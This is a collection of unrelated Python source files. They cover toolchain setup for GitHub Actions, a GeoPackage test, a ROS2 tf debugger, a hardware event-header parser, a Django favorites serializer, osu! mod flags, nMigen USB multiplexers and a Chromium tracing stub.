tc_dir = Path(to_path) / tc.get("release")
with tarfile.open(tar, "r:*") as tar:
tar.extractall(path=to_path)
return tc_dir
def main():
with ThreadPoolExecutor(max_workers=len(toolchains) + 1) as executor:
tasks = {executor.submit(download_chunks, tc): tc for tc in toolchains}
print(tasks)
files = []
for future in concurrent.futures.as_completed(tasks):
tc = tasks[future]
try:
dl = future.result()
files.append(dl)
except Exception as exc:
print("%r generated an exception: %s" % (tc, exc))
tc_paths = []
with ThreadPoolExecutor(max_workers=len(toolchains) + 1) as executor:
tasks = {
executor.submit(extract_as_tar, tc, file): tc
for (tc, file) in zip(toolchains, files)
}
for future in concurrent.futures.as_completed(tasks):
try:
tc_paths.append(future.result())
except Exception as exc:
print("Uh oh %s" % exc )
## Add PATHS to the envrionment
expand_path = os.pathsep.join(str(p) for p in tc_paths)
GHAction.addPath(expand_path)
os.environ["PATH"] = f"{expand_path}{os.pathsep}{os.environ['PATH']}"
print(os.environ["PATH"])
class GHAction:
def __init__ (self):
self.GITHUB_ = ''
@staticmethod
def addPath(pathstr):
"""
A string on a new line prepends to PATH
echo "::add-path::BAR"
"""
lout=f"::add-path::{pathstr}"
        # Print an extra newline in case one is missing from the previous flush
print("\n", lout)
@staticmethod
def exportVariable(env, val):
"""
A string on a new line with exports a environment variable
echo "::set-env name=FOO::BAR"
"""
lout=f"::set-env name={env}::{val}"
        # Print an extra newline in case one is missing from the previous flush
print("\n", lout )
if __name__ == "__main__":
main()
|
py | 1a40a3d4e848ea5e64e234defaccd9a416c2bb47 | #!/usr/bin/python2.7
"""
Copyright (C) 2014 Reinventing Geospatial, Inc.
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>,
or write to the Free Software Foundation, Inc., 59 Temple Place -
Suite 330, Boston, MA 02111-1307, USA.
Author: Jenifer Cochran, Reinventing Geospatial Inc (RGi)
Date: 2018-11-11
Requires: sqlite3, argparse
Optional: Python Imaging Library (PIL or Pillow)
Credits:
MapProxy imaging functions: http://mapproxy.org
gdal2mb on github: https://github.com/developmentseed/gdal2mb
Version:
"""
from pytest import raises
from scripts.geopackage.extensions.metadata.md_scope import MdScope
class TestMdScope(object):
def test_md_scope_from_text(self):
# test that all the mdscopes are properly converted from their text value
assert all([md_scope == MdScope.from_text(md_scope.value) for md_scope in MdScope])
def test_invalid_md_scope_from_text(self):
with raises(ValueError):
MdScope.from_text("NOTGOINGTOFINDTHISNnnope!!") |
py | 1a40a3d6be27e7e1414b58dc3c74644ee834f660 | import rclpy
from rclpy.time import Duration, Time
from rclpy.node import Node
from geometry_msgs.msg import TransformStamped
from tf2_ros import LookupException, ConnectivityException, ExtrapolationException
from tf2_ros.buffer import Buffer
from tf2_ros.transform_listener import TransformListener
from rclpy.qos import QoSPresetProfiles
import numpy as np
class Test(Node):
def __init__(self):
super().__init__('tf_debugger')
# create a tf2 buffer and listener
self.buffer = Buffer()
self.listener = TransformListener(self.buffer, self)
# create a tf2 broadcaster
self.pub_estim = self.create_publisher(TransformStamped, 'debug_estimation', QoSPresetProfiles.get_from_short_key('sensor_data'))
self.pub_filt = self.create_publisher(TransformStamped, 'debug_filtered', QoSPresetProfiles.get_from_short_key('sensor_data'))
def main(args=None):
rclpy.init(args=args)
node = Test()
while rclpy.ok():
rclpy.spin_once(node)
# Estimated Pose
try:
t = node.buffer.lookup_transform('world', 'chaser_0/estimated_pose', Time(seconds=0))
node.pub_estim.publish(t)
# node.get_logger().info('{}:{}'.format((t.stamp.sec, t.stamp.nanosec)))
except (LookupException, ConnectivityException, ExtrapolationException):
pass
# Filtered Pose
try:
t = node.buffer.lookup_transform('world', 'chaser_0/filtered_estimation', Time(seconds=0))
node.pub_filt.publish(t)
except (LookupException, ConnectivityException, ExtrapolationException):
pass
node.destroy_node()
rclpy.shutdown()
if __name__ == '__main__':
main() |
py | 1a40a5f41414609cf2283e130ea858378439b7e5 | ##############################################################################
## This file is part of 'L2SI Core'.
## It is subject to the license terms in the LICENSE.txt file found in the
## top-level directory of this distribution and at:
## https://confluence.slac.stanford.edu/display/ppareg/LICENSE.html.
## No part of 'L2SI Core', including this file,
## may be copied, modified, propagated, or distributed except according to
## the terms contained in the LICENSE.txt file.
##############################################################################
import ctypes
import struct
def getField(value, highBit, lowBit):
mask = 2**(highBit-lowBit+1)-1
return (value >> lowBit) & mask
def makeInt(ba):
return int.from_bytes(ba, 'little', signed=False)
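# Quick examples (explanatory note, not original code): getField extracts an
# inclusive bit range, e.g. getField(0b10110110, 5, 2) == 0b1101, and makeInt
# decodes little-endian bytes, e.g. makeInt(b'\x01\x02') == 0x0201.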
c_uint64 = ctypes.c_uint64
c_uint = ctypes.c_uint
class PackedStruct(ctypes.LittleEndianStructure):
_pack_ = 1
def __str__(self):
li = []
for f in self._fields_:
if issubclass(f[1], ctypes._SimpleCData):
li.append(f'{f[0]} - {getattr(self, f[0]):x}')
else:
li.append(f'{f[0]} - {getattr(self, f[0])}')
return '\n'.join(li)
def __new__(self, ba):
return self.from_buffer_copy(ba)
def __init__(self, ba):
pass
class TransitionInfo(PackedStruct):
_fields_ = [
('dmy1', c_uint, 1),
('l0Tag', c_uint, 5),
('dmy2', c_uint, 2),
('header', c_uint, 7)]
class EventInfo(PackedStruct):
_fields_ = [
('l0Accept', c_uint, 1),
('l0Tag', c_uint, 5),
('dmy1', c_uint, 1),
('l0Reject', c_uint, 1),
('l1Expect', c_uint, 1),
('l1Accept', c_uint, 1),
('l1Tag', c_uint, 5) ]
class TriggerInfo(ctypes.Union):
_fields_ = [
('eventInfo', EventInfo),
('transitionInfo', TransitionInfo),
('asWord', ctypes.c_uint16)]
def __init__(self, word):
self.asWord = word
def isEvent(self):
return ((self.asWord & 0x8000) != 0)
class EventHeader(PackedStruct):
_fields_ = [
('pulseId', ctypes.c_uint64, 56),
('dmy1', ctypes.c_uint8),
('timeStamp', ctypes.c_uint64),
('partitions', ctypes.c_uint8),
('dmy2', ctypes.c_uint8),
('triggerInfo', ctypes.c_uint16),
('count', ctypes.c_uint32, 24),
('version', ctypes.c_uint8, 8)]
def parseEventHeaderFrame(frame, enPrint=False):
"""Given a rogue Frame representing an Event Header or Transition, parse into a dictionary of fields"""
frameSize = frame.getPayload()
ba = bytearray(frameSize)
channel = frame.getChannel()
if (enPrint):
print(f'Got Event Header frame with channel: {channel} and size: {frameSize}')
frame.read(ba, 0)
return parseBa2(ba)
def parseBa1(ba):
eh = EventHeader(ba=ba)
ti = TriggerInfo(eh.triggerInfo)
return ti
fmt = '<QQBxHLxxxxxxxx'
def parseBa2(ba):
s = struct.unpack(fmt, ba)
d = {}
d['pulseId'] = (s[0] & 0x00FFFFFFFFFFFFFF)
d['timeStamp'] = s[1]
d['partitions'] = s[2]
d['triggerInfo'] = s[3]
d['count'] = s[4] & 0x00FFFFFF
d['version'] = s[4] >> 24
return d
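# Round-trip sketch (added for illustration; the header values below are made up):
if __name__ == '__main__':
    _raw = struct.pack(fmt, 0x0001020304050607, 0xDEADBEEF, 2, 0x8021, (1 << 24) | 42)
    # Expect pulseId=0x1020304050607, partitions=2, triggerInfo=0x8021, count=42, version=1
    print(parseBa2(bytearray(_raw)))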
|
py | 1a40a6c22a09cc661a287eec2af3f35c4dd155c4 | """
Various helper functions related to dictionaries.
"""
def extend_dictionary(d1, d2):
"""
Helper function to create a new dictionary with the contents of the two
given dictionaries. Does not modify either dictionary, and the values are
copied shallowly. If there are repeats, the second dictionary wins ties.
The function is written to ensure Skulpt compatibility.
Args:
d1 (dict): The first dictionary
d2 (dict): The second dictionary
Returns:
dict: The new dictionary
"""
d3 = {}
for key, value in d1.items():
d3[key] = value
for key, value in d2.items():
d3[key] = value
return d3
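# Example (illustrative): the second dictionary wins ties on repeated keys, so
# extend_dictionary({'a': 1, 'b': 2}, {'b': 3, 'c': 4}) == {'a': 1, 'b': 3, 'c': 4}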
|
py | 1a40a7143ec946b420fcb18cd5461330723270d7 | from django.utils import timezone
from rest_framework import serializers, status
from rest_framework.response import Response
from rest_framework.validators import UniqueTogetherValidator
from Colleges.models import Colleges
from Favorites.models import FavoriteColleges, FavoriteMajors
from Colleges.serializers import ForeignKeyCollegesSerializer
from Majors.serializers import ForeignKeyMajorsSerializer
from Users.serializers import ForeignKeyUserSerializer
class FavoriteSerializer(serializers.ModelSerializer):
"""
Base serializer for Favorites
"""
    # set current_user when collecting
current_user = serializers.HiddenField(
default=serializers.CurrentUserDefault()
)
add_time = serializers.DateTimeField(format='%Y-%m-%d %H: %M')
class Meta:
queryset = serializers.ModelSerializer
model = None
        # validator that disallows collecting the same item twice
validators = UniqueTogetherValidator(
queryset=queryset,
fields=('base', 'user'),
message="Repeating collection"
)
fields = ('base', 'user', 'add_time')
class FavoriteCollegesSerializer(serializers.ModelSerializer):
"""
Serializer for Favorite colleges
"""
    # set current_user when collecting
current_user = serializers.HiddenField(
default=serializers.CurrentUserDefault()
)
add_time = serializers.DateTimeField(format='%Y-%m-%d %H: %M')
base = ForeignKeyCollegesSerializer()
class Meta:
model = FavoriteColleges
queryset = FavoriteColleges.objects.all()
# fields = '__all__'
fields = ('current_user', 'base', 'add_time')
def create(self, validated_data):
college, _ = Colleges.objects.get_or_create(name=validated_data['base']['name'])
fav = Colleges.objects.get(name=college)
fav_college = FavoriteColleges.objects.create(user=validated_data["current_user"],
base=fav)
return Response(fav_college, status.HTTP_201_CREATED)
class FavoriteMajorsSerializer(serializers.ModelSerializer):
"""
Serializer for Favorite Majors
"""
    # set current_user when collecting
current_user = serializers.HiddenField(
default=serializers.CurrentUserDefault()
)
add_time = serializers.DateTimeField(format='%Y-%m-%d %H: %M')
base = ForeignKeyMajorsSerializer()
class Meta:
model = FavoriteMajors
queryset = FavoriteMajors.objects.all()
fields = '__all__'
|
py | 1a40a798ef1a6ec9e1f9bb0edad8db6281e97519 | int_to_mod = {
0 : ["NM", "NoMod"],
1 << 0 : ["NF", "NoFail"],
1 << 1 : ["EZ", "Easy"],
1 << 2 : ["TD", "TouchDevice"],
1 << 3 : ["HD", "Hidden"],
1 << 4 : ["HR", "HardRock"],
1 << 5 : ["SD", "SuddenDeath"],
1 << 6 : ["DT", "DoubleTime"],
1 << 7 : ["RX", "Relax"],
1 << 8 : ["HT", "HalfTime"],
1 << 9 : ["NC", "Nightcore"],
1 << 10 : ["FL", "Flashlight"],
1 << 11 : ["AT", "Autoplay"],
1 << 12 : ["SO", "SpunOut"],
1 << 13 : ["AP", "Autopilot"],
1 << 14 : ["PF", "Perfect"],
1 << 15 : ["K4", "Key4"],
1 << 16 : ["K5", "Key5"],
1 << 17 : ["K6", "Key6"],
1 << 18 : ["K7", "Key7"],
1 << 19 : ["K8", "Key8"],
1 << 20 : ["FI", "FadeIn"],
1 << 21 : ["RD", "Random"],
1 << 22 : ["CN", "Cinema"],
1 << 23 : ["TP", "Target"],
1 << 24 : ["K9", "Key9"],
1 << 25 : ["CO", "KeyCoop"],
1 << 26 : ["K1", "Key1"],
1 << 27 : ["K3", "Key3"],
1 << 28 : ["K2", "Key2"],
1 << 29 : ["V2", "ScoreV2"],
1 << 30 : ["MR", "Mirror"]
}
class ModCombination():
"""
An osu! mod combination.
Notes
-----
This class only exists to allow ``Mod`` to have ``ModCombination`` objects
as class attributes, as you can't instantiate instances of your own class in
a class definition.
"""
def __init__(self, value):
self.value = value
@staticmethod
def _parse_mod_string(mod_string):
"""
Creates an integer representation of a mod string made up of two letter
mod names ("HDHR", for example).
Parameters
----------
mod_string: str
The mod string to represent as an int.
Returns
-------
int
The integer representation of the mod string.
Raises
------
ValueError
If mod_string is empty, not of even length, or any of its 2-length
substrings do not correspond to a Mod in Mod.ORDER.
"""
if mod_string == "":
raise ValueError("Invalid mod string (cannot be empty)")
if len(mod_string) % 2 != 0:
raise ValueError(f"Invalid mod string {mod_string} (not of even "
"length)")
mod = Mod.NM
for i in range(0, len(mod_string) - 1, 2):
single_mod = mod_string[i: i + 2]
# there better only be one Mod that has an acronym matching ours,
# but a comp + 0 index works too
matching_mods = [mod for mod in Mod.ORDER if \
mod.short_name() == single_mod]
# ``mod.ORDER`` uses ``_NC`` and ``_PF``, and we want to parse
# eg "NC" as "DTNC"
if Mod._NC in matching_mods:
matching_mods.remove(Mod._NC)
matching_mods.append(Mod.NC)
if Mod._PF in matching_mods:
matching_mods.remove(Mod._PF)
matching_mods.append(Mod.PF)
if not matching_mods:
raise ValueError("Invalid mod string (no matching mod found "
f"for {single_mod})")
mod += matching_mods[0]
return mod.value
def short_name(self):
"""
The acronym-ized names of the component mods.
Returns
-------
str
The short name of this ModCombination.
Examples
--------
>>> ModCombination(576).short_name()
"NC"
>>> ModCombination(24).short_name()
"HDHR"
Notes
-----
This is a function instead of an attribute set at initialization time
because otherwise we couldn't refer to a :class:`~.Mod`\s as its class
body isn't loaded while it's instantiating :class:`~.Mod`\s.
Although technically mods such as NC are represented with two bits -
DT and NC - being set, short_name removes DT and so returns "NC"
rather than "DTNC".
"""
if self.value in int_to_mod:
# avoid infinite recursion with every mod decomposing into itself
# ad infinitum
return int_to_mod[self.value][0]
component_mods = self.decompose(clean=True)
return "".join(mod.short_name() for mod in component_mods)
def long_name(self):
"""
The spelled out names of the component mods.
Returns
-------
str
The long name of this ModCombination.
Examples
--------
>>> ModCombination(576).long_name()
"Nightcore"
>>> ModCombination(24).long_name()
"Hidden HardRock"
Notes
-----
This is a function instead of an attribute set at initialization time
because otherwise we couldn't refer to :class:`~.Mod`\s as its class
body isn't loaded while it's instantiating :class:`~.Mod`\s.
Although technically mods such as NC are represented with two bits -
DT and NC - being set, long_name removes DT and so returns "Nightcore"
rather than "DoubleTime Nightcore".
"""
if self.value in int_to_mod:
return int_to_mod[self.value][1]
component_mods = self.decompose(clean=True)
return " ".join(mod.long_name() for mod in component_mods)
def __eq__(self, other):
"""Compares the ``value`` of each object"""
if not isinstance(other, ModCombination):
return False
return self.value == other.value
def __add__(self, other):
"""Returns a Mod representing the bitwise OR of the two Mods"""
return ModCombination(self.value | other.value)
def __sub__(self, other):
return ModCombination(self.value & ~other.value)
def __hash__(self):
return hash(self.value)
def __repr__(self):
return f"ModCombination(value={self.value})"
def __str__(self):
return self.short_name()
def __contains__(self, other):
return bool(self.value & other.value)
def decompose(self, clean=False):
"""
Decomposes this mod into its base component mods, which are
:class:`~.ModCombination`\s with a ``value`` of a power of two.
Parameters
----------
clean: bool
If true, removes mods that we would think of as duplicate - if both
NC and DT are component mods, remove DT. If both PF and SD are
component mods, remove SD.
Returns
-------
list[:class:`~.ModCombination`]
A list of the component :class:`~.ModCombination`\s of this mod,
ordered according to :const:`~circleguard.mod.ModCombination.ORDER`.
"""
mods = [ModCombination(mod_int) for mod_int in int_to_mod if
self.value & mod_int]
# order the mods by Mod.ORDER
mods = [mod for mod in Mod.ORDER if mod in mods]
if not clean:
return mods
if Mod._NC in mods and Mod.DT in mods:
mods.remove(Mod.DT)
if Mod._PF in mods and Mod.SD in mods:
mods.remove(Mod.SD)
return mods
class Mod(ModCombination):
"""
An ingame osu! mod.
Common combinations are available as ``HDDT``, ``HDHR``, and ``HDDTHR``.
Parameters
----------
value: int or str or list
A representation of the desired mod. This can either be its integer
representation such as ``64`` for ``DT`` and ``72`` (``64`` + ``8``) for
``HDDT``, or a string such as ``"DT"`` for ``DT`` and ``"HDDT"`` (or
``DTHD``) for ``HDDT``, or a list of strings such as ``["HD", "DT"]``
for ``HDDT``.
|br|
If used, the string must be composed of two-letter acronyms for mods,
in any order.
Notes
-----
The nightcore mod is never set by itself. When we see plays set with ``NC``,
we are really seeing a ``DT + NC`` play. ``NC`` by itself is ``512``, but
what we expect to see is ``576`` (``512 + 64``; ``DT`` is ``64``). As such
``Mod.NC`` is defined to be the more intuitive version—``DT + NC``. We
provide the true, technical version of the ``NC`` mod (``512``) as
``Mod._NC``.
This same treatment and reasoning applies to ``Mod.PF``, which we define
as ``PF + SD``. The technical version of PF is available as ``Mod._PF``.
A full list of mods and their specification can be found at
https://osu.ppy.sh/help/wiki/Game_Modifiers, or a more technical list at
https://github.com/ppy/osu-api/wiki#mods.
Warnings
--------
The fact that this class subclasses ModCombination is slightly misleading.
This is only done so that this class can be instantiated directly, backed
by an internal ModCombination, instead of exposing ModCombination to users.
"""
NM = NoMod = ModCombination(0)
NF = NoFail = ModCombination(1 << 0)
EZ = Easy = ModCombination(1 << 1)
TD = TouchDevice = ModCombination(1 << 2)
HD = Hidden = ModCombination(1 << 3)
HR = HardRock = ModCombination(1 << 4)
SD = SuddenDeath = ModCombination(1 << 5)
DT = DoubleTime = ModCombination(1 << 6)
RX = Relax = ModCombination(1 << 7)
HT = HalfTime = ModCombination(1 << 8)
_NC = _Nightcore = ModCombination(1 << 9)
# most people will find it more useful for NC to be defined as it is ingame
NC = Nightcore = _NC + DT
FL = Flashlight = ModCombination(1 << 10)
AT = Autoplay = ModCombination(1 << 11)
SO = SpunOut = ModCombination(1 << 12)
AP = Autopilot = ModCombination(1 << 13)
_PF = _Perfect = ModCombination(1 << 14)
PF = Perfect = _PF + SD
K4 = Key4 = ModCombination(1 << 15)
K5 = Key5 = ModCombination(1 << 16)
K6 = Key6 = ModCombination(1 << 17)
K7 = Key7 = ModCombination(1 << 18)
K8 = Key8 = ModCombination(1 << 19)
FI = FadeIn = ModCombination(1 << 20)
RD = Random = ModCombination(1 << 21)
CN = Cinema = ModCombination(1 << 22)
TP = Target = ModCombination(1 << 23)
K9 = Key9 = ModCombination(1 << 24)
CO = KeyCoop = ModCombination(1 << 25)
K1 = Key1 = ModCombination(1 << 26)
K3 = Key3 = ModCombination(1 << 27)
K2 = Key2 = ModCombination(1 << 28)
V2 = ScoreV2 = ModCombination(1 << 29)
MR = Mirror = ModCombination(1 << 30)
KM = KeyMod = K1 + K2 + K3 + K4 + K5 + K6 + K7 + K8 + K9 + KeyCoop
# common mod combinations
HDDT = HD + DT
HDHR = HD + HR
HDDTHR = HD + DT + HR
# how people naturally sort mods in combinations (HDDTHR, not DTHRHD)
# sphinx uses repr() here
# (see https://github.com/sphinx-doc/sphinx/issues/3857), so provide
# our own, more human readable docstrings. #: denotes sphinx docstrings.
#: [NM, EZ, HD, HT, DT, _NC, HR, FL, NF, SD, _PF, RX, AP, SO, AT, V2, TD,
#: FI, RD, CN, TP, K1, K2, K3, K4, K5, K6, K7, K8, K9, CO, MR]
ORDER = [NM, EZ, HD, HT, DT, _NC, HR, FL, NF, SD, _PF, RX, AP, SO, AT,
V2, TD, # we stop caring about order after this point
FI, RD, CN, TP, K1, K2, K3, K4, K5, K6, K7, K8, K9, CO, MR]
def __init__(self, value):
if isinstance(value, str):
value = ModCombination._parse_mod_string(value)
if isinstance(value, list):
mod = Mod.NM
for mod_str in value:
mod += Mod(mod_str)
value = mod.value
if isinstance(value, ModCombination):
value = value.value
super().__init__(value)
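# A few self-checks (added for illustration; derived from the definitions above):
if __name__ == "__main__":
    assert Mod("HDHR") == Mod.HD + Mod.HR
    assert Mod(["HD", "DT"]).long_name() == "Hidden DoubleTime"
    # NC is stored as DT + _NC (576), but decomposes cleanly back to "NC"
    assert Mod("NC").value == 576 and Mod("NC").short_name() == "NC"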
|
py | 1a40aaca9d2db5b93cc5641917a8520bd354da50 | import yaml
def load_config(yaml_file):
with open(yaml_file, 'r') as yam:
return yaml.load(yam)
|
py | 1a40aaf46f55a0ad0bb2830429e2ee4afc0d2a5c | #!/usr/bin/python
# encoding: utf-8
"""
@author: Ian
@file: __init__.py.py
@time: 2019-09-16 16:50
""" |
py | 1a40adc10b7a729bde53c31ed76f1e327bbd8e07 | #!/usr/bin/env python
from python.decorators import euler_timer
from python.functions import fill_count
def main(verbose=False):
count = 2
n = 50
while count <= 10 ** 6:
n += 1
count = fill_count(50, n)
return n
if __name__ == '__main__':
print euler_timer(115)(main)(verbose=True)
|
py | 1a40ae23de3325e62a1265a03af81047bf4d52c2 | from collections import OrderedDict
from nmigen import *
from nmigen.hdl.rec import *
from .endpoint import *
__all__ = ["DoubleBuffer", "InputMultiplexer", "OutputMultiplexer"]
class DoubleBuffer(Elaboratable):
def __init__(self, *, depth, width, read_ack=False):
self.w_stb = Signal()
self.w_lst = Signal()
self.w_data = Signal(width)
self.w_drop = Signal()
self.w_rdy = Signal()
self.r_stb = Signal()
self.r_lst = Signal()
self.r_data = Signal(width)
self.r_rdy = Signal()
self.r_ack = Signal(1 if read_ack else 0)
self.depth = depth
self.width = width
self.read_ack = read_ack
def elaborate(self, platform):
m = Module()
banks = [Record([("w_addr", range(self.depth)), ("w_data", self.width), ("w_en", 1),
("r_addr", range(self.depth)), ("r_data", self.width), ("r_en", 1),
("valid", 1), ("level", range(self.depth + 1))],
name="bank_{}".format(i))
for i in range(2)]
for i, bank in enumerate(banks):
mem = Memory(depth=self.depth, width=self.width)
m.submodules["mem{}_wp".format(i)] = mem_wp = mem.write_port()
m.submodules["mem{}_rp".format(i)] = mem_rp = mem.read_port(transparent=False)
m.d.comb += [
mem_wp.addr.eq(bank.w_addr),
mem_wp.data.eq(bank.w_data),
mem_wp.en.eq(bank.w_en),
mem_rp.addr.eq(bank.r_addr),
mem_rp.en.eq(bank.r_en),
bank.r_data.eq(mem_rp.data),
]
bank_lru = Signal()
with m.FSM(reset="WRITE-0") as write_fsm:
with m.State("WAIT"):
with m.If(~banks[0].valid):
m.next = "WRITE-0"
with m.Elif(~banks[1].valid):
m.next = "WRITE-1"
for i, bank in enumerate(banks):
with m.State("WRITE-{}".format(i)):
w_addr_inc = Signal.like(bank.w_addr, name_suffix="_inc")
m.d.comb += w_addr_inc.eq(bank.w_addr + 1)
m.d.comb += [
self.w_rdy.eq(1),
bank.w_en.eq(self.w_stb),
bank.w_data.eq(self.w_data),
]
with m.If(self.w_stb):
with m.If(self.w_lst):
m.d.sync += bank.w_addr.eq(0)
m.next = "WAIT"
with m.If(~self.w_drop):
m.d.sync += [
bank.valid.eq(1),
bank.level.eq(w_addr_inc),
bank_lru.eq(1 - i),
]
with m.Elif(w_addr_inc == self.depth):
# Overflow. Flush remaining bytes.
m.d.sync += bank.w_addr.eq(0)
m.next = "FLUSH"
with m.Else():
m.d.sync += bank.w_addr.eq(w_addr_inc)
with m.State("FLUSH"):
m.d.comb += self.w_rdy.eq(1)
with m.If(self.w_stb & self.w_lst):
m.next = "WAIT"
with m.FSM() as read_fsm:
with m.State("WAIT"):
with m.If(banks[0].valid & ~(banks[1].valid & bank_lru)):
m.d.comb += banks[0].r_en.eq(1)
m.d.sync += banks[0].r_addr.eq(1)
m.d.sync += self.r_lst.eq(banks[0].level == 1)
m.next = "READ-0"
with m.Elif(banks[1].valid):
m.d.comb += banks[1].r_en.eq(1)
m.d.sync += banks[1].r_addr.eq(1)
m.d.sync += self.r_lst.eq(banks[1].level == 1)
m.next = "READ-1"
for i, bank in enumerate(banks):
with m.State("READ-{}".format(i)):
r_addr_inc = Signal.like(bank.r_addr, name_suffix="_inc")
m.d.comb += r_addr_inc.eq(bank.r_addr + 1)
m.d.comb += [
self.r_stb.eq(1),
self.r_data.eq(bank.r_data),
]
with m.If(self.r_rdy):
r_done = self.r_ack if self.read_ack else self.r_lst
with m.If(r_done):
m.d.sync += bank.valid.eq(0)
m.d.sync += bank.r_addr.eq(0)
m.next = "WAIT"
with m.Else():
m.d.comb += bank.r_en.eq(1)
with m.If(r_addr_inc == bank.level):
m.d.sync += bank.r_addr.eq(0)
m.d.sync += self.r_lst.eq(1)
with m.Else():
m.d.sync += bank.r_addr.eq(r_addr_inc)
m.d.sync += self.r_lst.eq(0)
return m
class InputMultiplexer(Elaboratable):
def __init__(self):
self.sel = Record([
("addr", 4, DIR_FANIN),
("xfer", 2, DIR_FANOUT),
("err", 1, DIR_FANOUT),
])
self.pkt = Record([
("stb", 1, DIR_FANOUT),
("lst", 1, DIR_FANOUT),
("data", 8, DIR_FANOUT),
("zlp", 1, DIR_FANOUT),
("rdy", 1, DIR_FANIN),
("ack", 1, DIR_FANIN),
])
self.sof = Signal()
self._ep_map = OrderedDict()
self._addr_map = OrderedDict()
def add_endpoint(self, ep, *, addr, buffered=False):
if not isinstance(ep, InputEndpoint):
raise TypeError("Endpoint must be an InputEndpoint, not {!r}"
.format(ep))
if not isinstance(addr, int):
raise TypeError("Endpoint address must be an integer, not {!r}"
.format(addr))
        if addr not in range(16):
raise ValueError("Endpoint address must be between 0 and 15, not {}"
.format(addr))
if addr in self._ep_map:
raise ValueError("Endpoint address {} has already been assigned"
.format(addr))
if ep in self._addr_map:
raise ValueError("Endpoint {!r} has already been added at address {}"
.format(ep, self._addr_map[ep]))
if addr == 0 and ep.xfer is not Transfer.CONTROL:
raise ValueError("Invalid transfer type {} for endpoint 0; must be CONTROL"
.format(Transfer(ep.xfer).name))
self._ep_map[addr] = ep, buffered
self._addr_map[ep] = addr
def elaborate(self, platform):
m = Module()
port_map = OrderedDict({addr: Record.like(self.pkt) for addr in self._ep_map})
for addr, (ep, buffered) in self._ep_map.items():
port = port_map[addr]
if buffered:
dbuf = DoubleBuffer(depth=ep.max_size, width=port.data.width + port.zlp.width,
read_ack=ep.xfer is not Transfer.ISOCHRONOUS)
m.submodules["dbuf_{}".format(addr)] = dbuf
m.d.comb += [
dbuf.w_stb.eq(ep.stb),
dbuf.w_lst.eq(ep.lst),
dbuf.w_data.eq(Cat(ep.data, ep.zlp)),
ep.rdy.eq(dbuf.w_rdy),
port.stb.eq(dbuf.r_stb),
port.lst.eq(dbuf.r_lst),
Cat(port.data, port.zlp).eq(dbuf.r_data),
dbuf.r_rdy.eq(port.rdy),
dbuf.r_ack.eq(port.ack),
]
else:
m.d.comb += [
port.stb.eq(ep.stb),
port.lst.eq(ep.lst),
port.data.eq(ep.data),
port.zlp.eq(ep.zlp),
ep.rdy.eq(port.rdy),
ep.ack.eq(port.ack),
]
m.d.comb += ep.sof.eq(self.sof)
with m.Switch(self.sel.addr):
for addr, port in port_map.items():
ep, _ = self._ep_map[addr]
with m.Case(addr):
m.d.comb += [
self.sel.xfer.eq(ep.xfer),
port.connect(self.pkt),
]
with m.Default():
# Unknown endpoint.
m.d.comb += self.sel.err.eq(1)
return m
class OutputMultiplexer(Elaboratable):
def __init__(self):
self.sel = Record([
("addr", 4, DIR_FANIN),
("xfer", 2, DIR_FANOUT),
("err", 1, DIR_FANOUT),
])
self.pkt = Record([
("stb", 1, DIR_FANIN),
("lst", 1, DIR_FANIN),
("data", 8, DIR_FANIN),
("zlp", 1, DIR_FANIN),
("setup", 1, DIR_FANIN),
("drop", 1, DIR_FANIN),
("rdy", 1, DIR_FANOUT),
])
self.sof = Signal()
self._ep_map = OrderedDict()
self._addr_map = OrderedDict()
def add_endpoint(self, ep, *, addr, buffered=False):
if not isinstance(ep, OutputEndpoint):
raise TypeError("Endpoint must be an OutputEndpoint, not {!r}"
.format(ep))
if not isinstance(addr, int):
raise TypeError("Endpoint address must be an integer, not {!r}"
.format(addr))
        if addr not in range(16):
raise ValueError("Endpoint address must be between 0 and 15, not {}"
.format(addr))
if addr in self._ep_map:
raise ValueError("Endpoint address {} has already been assigned"
.format(addr))
if ep in self._addr_map:
raise ValueError("Endpoint {!r} has already been added at address {}"
.format(ep, self._addr_map[ep]))
if addr == 0 and ep.xfer is not Transfer.CONTROL:
raise ValueError("Invalid transfer type {} for endpoint 0; must be CONTROL"
.format(Transfer(ep.xfer).name))
self._ep_map[addr] = ep, buffered
self._addr_map[ep] = addr
def elaborate(self, platform):
m = Module()
port_map = OrderedDict({addr: Record.like(self.pkt) for addr in self._ep_map})
for addr, (ep, buffered) in self._ep_map.items():
port = port_map[addr]
if buffered:
dbuf_w_data = Cat(port.data, port.zlp, port.setup)
dbuf = DoubleBuffer(depth=ep.max_size, width=len(dbuf_w_data))
m.submodules["dbuf_{}".format(addr)] = dbuf
m.d.comb += [
dbuf.w_stb.eq(port.stb),
dbuf.w_lst.eq(port.lst),
dbuf.w_data.eq(dbuf_w_data),
dbuf.w_drop.eq(port.drop),
port.rdy.eq(dbuf.w_rdy),
ep.stb.eq(dbuf.r_stb),
ep.lst.eq(dbuf.r_lst),
Cat(ep.data, ep.zlp, ep.setup).eq(dbuf.r_data),
dbuf.r_rdy.eq(ep.rdy),
]
else:
m.d.comb += [
ep.stb.eq(port.stb),
ep.lst.eq(port.lst),
ep.data.eq(port.data),
ep.zlp.eq(port.zlp),
ep.setup.eq(port.setup),
ep.drop.eq(port.drop),
port.rdy.eq(ep.rdy),
]
m.d.comb += ep.sof.eq(self.sof)
with m.Switch(self.sel.addr):
for addr, port in port_map.items():
ep, _ = self._ep_map[addr]
with m.Case(addr):
m.d.comb += [
self.sel.xfer.eq(ep.xfer),
port.connect(self.pkt),
]
with m.Default():
# Unknown endpoint.
m.d.comb += self.sel.err.eq(1)
return m
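# Illustrative wiring sketch (comments only; ``ep_in`` and ``ep_out`` are
# assumed InputEndpoint/OutputEndpoint instances from .endpoint, not defined
# in this module):
#   in_mux = InputMultiplexer()
#   in_mux.add_endpoint(ep_in, addr=1, buffered=True)
#   out_mux = OutputMultiplexer()
#   out_mux.add_endpoint(ep_out, addr=1)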
|
py | 1a40aeab96aab6a859c416e72b5674ccd036cfd7 | # Copyright 2017 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
# Tracing agent that captures friendly process and thread data - names, pids,
# tids, etc. - to enrich the display in the trace viewer. Captures snapshots
# of the output of 'ps' on the device at intervals.
import logging
import py_utils
from devil.android import device_utils
